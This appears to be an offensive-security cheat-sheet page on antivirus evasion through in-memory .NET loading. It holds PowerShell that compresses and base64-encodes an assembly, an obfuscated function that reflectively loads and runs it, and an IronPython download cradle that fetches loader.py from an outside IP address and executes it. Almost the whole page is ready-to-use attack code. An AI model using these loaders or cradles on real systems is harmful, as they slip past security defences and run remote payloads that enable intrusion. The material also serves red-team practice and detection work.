.NET Reflective Assembly

A way to bypass AV signature analysis: you can gzip-compress and base64-encode a .NET assembly to load it reflectively via PowerShell right from memory (when compiling the binary, make Program class and its Main method public):

CompressEncodeAssembly.ps1

$bytes = [System.IO.File]::ReadAllBytes("$(pwd)\binary.exe")
[System.IO.MemoryStream] $outStream = New-Object System.IO.MemoryStream
$gzipStream = New-Object System.IO.Compression.GzipStream($outStream, [System.IO.Compression.CompressionMode]::Compress)
$gzipStream.Write($bytes, 0, $bytes.Length)
$gzipStream.Close()
$outStream.Close()
[byte[]] $outBytes = $outStream.ToArray()
$b64Zipped = [System.Convert]::ToBase64String($outBytes)
$b64Zipped | Out-File -NoNewLine -Encoding ASCII .\b64.txt
notepad.exe .\b64.txt

This blog post covers the topic in depth.

An example how the binary can be actually decoded, decompressed and run from memory:

Invoke-S0m3B1n4ry.ps1

function Invoke-S0m3B1n4ry
{
	#[CmdletBinding()]
	#Param([String]$Command = " ")

	$a = New-Object System.IO.MemoryStream(, [System.Convert]::FromBase64String("..."))
	$b = New-Object System.IO.Compression.GZipStream($a, [System.IO.Compression.CompressionMode]::Decompress)
	$c = New-Object System.IO.MemoryStream;
	$b.CopyTo($c)
	[byte[]]$d = $c.ToArray()
	$e = [System.Reflection.Assembly]::Load($d)
	$f = [System.Console]::Out
	$g = New-Object System.IO.StringWriter
	[System.Console]::SetOut($g)

	$h = [Reflection.BindingFlags]"Public,NonPublic,Static"
	$i = $e.GetType("S0m3B1n4ry.Program", $h)
	$j = $i.GetMethod("Main", $h)
	$j.Invoke($null, (, [string[]]$args))
	#$i = [S0m3B1n4ry.Program]::Main($Command.Split())

	[System.Console]::SetOut($f)
	$k = $g.ToString()
	$k
}

IronPython Loader

Cradle:

>>> import urllib.request
>>> request = urllib.request.Request('http://10.10.13.37/loader.py')
>>> result = urllib.request.urlopen(request)
>>> payload = result.read()
>>> exec(payload)

Payload:

loader.py

import clr
import zlib
import base64

clr.AddReference('System')
from System import *
from System.Reflection import *

b64 = base64.b64encode(zlib.decompress(base64.b64decode(b'<LOADER_BYTES_B64>'))).decode()
raw = Convert.FromBase64String(b64)

assembly = Assembly.Load(raw)
type = assembly.GetType('Loader.Program')
type.GetMethod('Main').Invoke(Activator.CreateInstance(type), None)

Last updated 9 months ago